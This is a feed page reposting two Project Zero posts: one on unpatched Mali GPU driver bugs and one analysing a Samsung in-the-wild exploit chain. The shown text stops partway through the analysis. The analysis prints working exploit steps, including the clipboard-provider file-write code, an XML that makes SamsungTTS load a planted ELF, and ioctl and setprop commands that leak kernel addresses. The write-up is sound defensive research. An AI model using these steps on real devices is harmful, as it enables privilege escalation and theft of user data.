Project Zero

Syndikovat obsah
News and updates from the Project Zero team at Google
Aktualizace: 1 min 56 sek zpět

Mind the Gap

22 Listopad, 2022 - 22:05
@import url('https://themes.googleusercontent.com/fonts/css?kit=OPeqXG-QxW3ZD8BtmPikfA');.lst-kix_9apzkelodq30-0>li:before{content:"\0025cf "}ul.lst-kix_9apzkelodq30-6{list-style-type:none}ul.lst-kix_9apzkelodq30-7{list-style-type:none}ul.lst-kix_9apzkelodq30-4{list-style-type:none}ul.lst-kix_9apzkelodq30-5{list-style-type:none}ul.lst-kix_9apzkelodq30-2{list-style-type:none}ul.lst-kix_9apzkelodq30-3{list-style-type:none}ul.lst-kix_9apzkelodq30-0{list-style-type:none}.lst-kix_9apzkelodq30-6>li:before{content:"\0025cf "}ul.lst-kix_9apzkelodq30-1{list-style-type:none}.lst-kix_9apzkelodq30-5>li:before{content:"\0025a0 "}.lst-kix_9apzkelodq30-3>li:before{content:"\0025cf "}.lst-kix_9apzkelodq30-7>li:before{content:"\0025cb "}.lst-kix_9apzkelodq30-4>li:before{content:"\0025cb "}.lst-kix_9apzkelodq30-8>li:before{content:"\0025a0 "}ul.lst-kix_9apzkelodq30-8{list-style-type:none}.lst-kix_9apzkelodq30-1>li:before{content:"\0025cb "}.lst-kix_9apzkelodq30-2>li:before{content:"\0025a0 "}ol{margin:0;padding:0}table td,table th{padding:0}.HwIiAvYVxJ-c0{color:#000000;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial";font-style:normal}.HwIiAvYVxJ-c6{color:#000000;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:16pt;font-family:"Arial";font-style:normal}.HwIiAvYVxJ-c7{padding-top:18pt;padding-bottom:6pt;line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}.HwIiAvYVxJ-c9{color:#000000;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial"}.HwIiAvYVxJ-c4{padding-top:0pt;padding-bottom:0pt;line-height:1.5;orphans:2;widows:2;text-align:left}.HwIiAvYVxJ-c3{text-decoration-skip-ink:none;-webkit-text-decoration-skip:none;color:#1155cc;text-decoration:underline}.HwIiAvYVxJ-c10{background-color:#ffffff;font-size:10.5pt;font-family:"Roboto";font-weight:400}.HwIiAvYVxJ-c8{background-color:#ffffff;max-width:468pt;padding:72pt 72pt 72pt 72pt}.HwIiAvYVxJ-c1{color:inherit;text-decoration:inherit}.HwIiAvYVxJ-c11{background-color:#ffffff}.HwIiAvYVxJ-c2{font-style:italic}.HwIiAvYVxJ-c5{height:11pt}.title{padding-top:0pt;color:#000000;font-size:26pt;padding-bottom:3pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}.subtitle{padding-top:0pt;color:#666666;font-size:15pt;padding-bottom:16pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}li{color:#000000;font-size:11pt;font-family:"Arial"}p{margin:0;color:#000000;font-size:11pt;font-family:"Arial"}h1{padding-top:20pt;color:#000000;font-size:20pt;padding-bottom:6pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h2{padding-top:18pt;color:#000000;font-size:16pt;padding-bottom:6pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h3{padding-top:16pt;color:#434343;font-size:14pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h4{padding-top:14pt;color:#666666;font-size:12pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h5{padding-top:12pt;color:#666666;font-size:11pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h6{padding-top:12pt;color:#666666;font-size:11pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;font-style:italic;orphans:2;widows:2;text-align:left}

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in the wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title                    Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE                   CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue      6th January 2022

Impact                A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) lead to kernel memory corruption, one (2331) lead to physical memory addresses being disclosed to userspace and the remaining three (2325, 2327, 2333) lead to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

Kategorie: Hacking & Security

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 Listopad, 2022 - 16:50

Maddie Stone, Project Zero


Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.


As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendor’s transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.


While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes. 


We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products. 

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.


The sample used three vulnerabilities, all patched in March 2021 by Samsung: 

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337

  2. Kernel information leak via sec_log - CVE-2021-25369

  3. Use-after-free the Display Processing Unit (DPU) driver - CVE-2021-25370


The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC and phones sold most other places (ex. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.


Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.


The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June. 

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user. 



About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.


According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.


Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:
DATABASE_NAME = ‘clipboardimage.db’

TABLE_NAME = ‘ClipboardImageTable’

URL = ‘content://com.sec.android.semclipboardprovider/images’

CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";


Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.  


UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead, its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>


Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor. 


    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }


The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.


The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.


ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

URI semclipboard_uri = URI.parse("content://com.sec.android.semclipboardprovider")

ContentResolver resolver = getContentResolver();

URI newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd(); 


Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.

  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.

  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.

  4. Get the ContentResolver object that allows apps access to ContentProviders.

  5. Call insert on the semclipboardprovider with our key-value pair.

  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.


The exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app’s don’t have access to open or create users_system_data_file files so in this case they are proxying the open through system_server who can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passess the fd to the calling process, the calling process can now read and write to it.


The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.


This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks if the PID of the calling process is UID 1000, meaning that it is already also running with system privileges.


  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).


The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.


Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API. 


The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.


To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.


<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name=\"eng-USA-Variant Info\">f00</string>\n"

          <string name=\"SMT_STUBCHECK_STATUS\">STUB_SUCCESS</string>\n"

          <string name=\"SMT_LATEST_INSTALLED_ENGINE_PATH\">/data/system/users/0/newFile.bin</string>\n"

      </map>


The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context. 


The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.


Phones released on Android P and earlier seemed to have a version of the app pre-3.0.08.18 which does load the executable up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file. 


Once the ELF file is loaded via the System.load api, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continued. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.


The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.



The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg. 


oid __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();


        pr_warn("------------[ cut here ]------------\n");


        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);


        if (args)

                vprintk(args->fmt, args->args);


        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }


        print_modules();


        dump_stack();


        print_oops_end_marker();


        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}



On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 


a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg


$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };


Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log. 


The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F)  still used a vulnerable version of the driver (r19p0) as of January 2021.  



/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;


        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;


        cli = filp->private_data;

        if (!cli)

                return -EINVAL;


        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

        

        [...]


        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }


        return rcode;

}


Specifically the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl to initialize the hwcnt driver and be able to call ioctl’s and then to the hwcnt ioctl target with an invalid ioctl number: 0xFE.


  hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);

   ioctl(hwcnt_fd, 0x4004BEFE, 0);


To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:


setprop dumpstate.options bugreportfull;

setprop ctl.start bugreport;


In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport. 


allow at_distributor ctl_start_prop:file { getattr map open read };

allow at_distributor ctl_start_prop:property_service set;

allow bootchecker ctl_start_prop:file { getattr map open read };

allow bootchecker ctl_start_prop:property_service set;

allow dumpstate property_type:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:property_service set;

allow ikev2_client ctl_start_prop:file { getattr map open read };

allow ikev2_client ctl_start_prop:property_service set;

allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };

allow init property_type:property_service set;

allow keystore ctl_start_prop:file { getattr map open read };

allow keystore ctl_start_prop:property_service set;

allow mediadrmserver ctl_start_prop:file { getattr map open read };

allow mediadrmserver ctl_start_prop:property_service set;

allow multiclientd ctl_start_prop:file { getattr map open read };

allow multiclientd ctl_start_prop:property_service set;

allow radio ctl_start_prop:file { getattr map open read };

allow radio ctl_start_prop:property_service set;

allow shell ctl_start_prop:file { getattr map open read };

allow shell ctl_start_prop:property_service set;

allow surfaceflinger ctl_start_prop:file { getattr map open read };

allow surfaceflinger ctl_start_prop:property_service set;

allow system_app ctl_start_prop:file { getattr map open read };

allow system_app ctl_start_prop:property_service set;

allow system_server ctl_start_prop:file { getattr map open read };

allow system_server ctl_start_prop:property_service set;

allow vold ctl_start_prop:file { getattr map open read };

allow vold ctl_start_prop:property_service set;

allow wlandutservice ctl_start_prop:file { getattr map open read };

allow wlandutservice ctl_start_prop:property_service set;


The bugreport service is defined in /system/etc/init/dumpstate.rc:


service bugreport /system/bin/dumpstate -d -p -B -z \

        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport

    class main

    disabled

    oneshot


The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.


The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.


  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));

  LOBYTE(s) = 18;

  v650[0] = 0LL;

  s_8 = 17664LL;

  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";

  DurationReporter::DurationReporter(v636, (__int64)&s, 0);

  if ( ((unsigned __int8)s & 1) != 0 )

    operator delete(v650[0]);

  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");


After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.


An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.


<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------

<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664

<4>[90808.635663]  [4:    poc:25943] Modules linked in:

<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1

<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)

<4>[90808.635689]  [4:    poc:25943] Call trace:

<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280

<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24

<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4

<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164tv

<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c

<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c

<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150

<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164

<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)

<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000

<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a

<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b

<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026

<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000

<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004

<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000

<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80

<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008

<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c

<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74


The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.


$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app


allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };


allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };


allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.

  • Removed the bugreport service from dumpstate.rc.


In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.

  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.


Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access. 



Find the PID of android.hardware.graphics.composer

To be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process. 


The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:


stream lids=0,3,4


The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.


Now it has the PID of android.hardware.graphics.composer, where android.hardware.graphics composer is the Hardware Composer HAL.


Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path. 


Triggering the Use-After-Free

